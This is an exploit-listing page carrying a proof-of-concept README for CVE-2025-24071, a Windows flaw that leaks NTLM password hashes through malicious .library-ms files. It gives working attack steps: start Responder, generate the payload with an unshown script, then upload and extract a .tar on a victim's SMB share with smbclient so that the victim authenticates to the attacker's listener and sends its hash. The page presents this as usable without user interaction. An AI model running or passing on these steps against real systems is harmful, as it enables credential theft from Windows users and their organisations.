Exploit for CVE-2025-24071

Name: Exploit for CVE-2025-24071
Rating: 5 (276 reviews)
2025-05-28 | CVSS 6.5
## https://sploitus.com/exploit?id=B7436966-38EB-53C7-9295-00D0322061AC
# CVE-2025-24071 PoC (SMB + TAR Extraction Method)

This is a PoC for exploiting **CVE-2025-24071**, a vulnerability in Windows that allows NTLM hash leakage via `.library-ms` files. This version diverges slightly from others by using a `.tar` archive instead of a `.zip`, which improves compatibility in SMB-only environments.

## 📌 Why `.tar` instead of `.zip`?

Most public PoCs use `.zip` to package the malicious `.library-ms` file. However, if you're working in a restricted SMB environment (e.g., only access via `smbclient`), ZIP files can't be extracted remotely. By using a `.tar` archive, you can extract the payload directly from the SMB share using the `tar` command built into `smbclient`, allowing remote deployment **without needing user interaction**.

---

## 🔧 Requirements

- Attacker machine with:
  - `Responder` installed and running
  - An SMB server (e.g., `Responder`, `impacket-smbserver`, or `samba`)
- Victim machine:
  - Windows with SMB access enabled to the attacker's IP
---

## 🧪 Steps

### 1. Start Responder

Start Responder on the correct interface:

```bash
sudo responder -I <interface>
```

Make sure the IP in the payload matches this interface.

### 2. Generate the malicious .library-ms and pack into .tar

```bash
python3 create_tar_poc.py
```

You’ll be prompted to enter:

- A file name (e.g., exploit)
- The attacker's IP (e.g., 192.168.1.100)

This generates:

- exploit.library-ms (inside exploit.tar)
- exploit.tar

### 3. Upload and extract on the victim's SMB share

From your attacker machine, connect to the victim's SMB share using smbclient:


```bash
smbclient //<victim_ip>/<sharename> -U <USERNAME>
put exploit.tar
tar x exploit.tar
```
This will unpack the .library-ms into the share.

When the exploit.tar is extracted, the .library-ms file containing a malicious xml will connect to our SMB which is the active Responder on our machine, thus starting an authentication attempt using NTLM by sending a request containing the username, domain and the NTLM hash of the user's password, which we can later decrypt.

## 📽️ PoC Video

Coming soon...

## 🙏 Credits
Daniel Miranda Barcelona AKA Excal1bur | Based on the original work by 0x6rss, adapted for TAR-based SMB deployments in lab scenarios.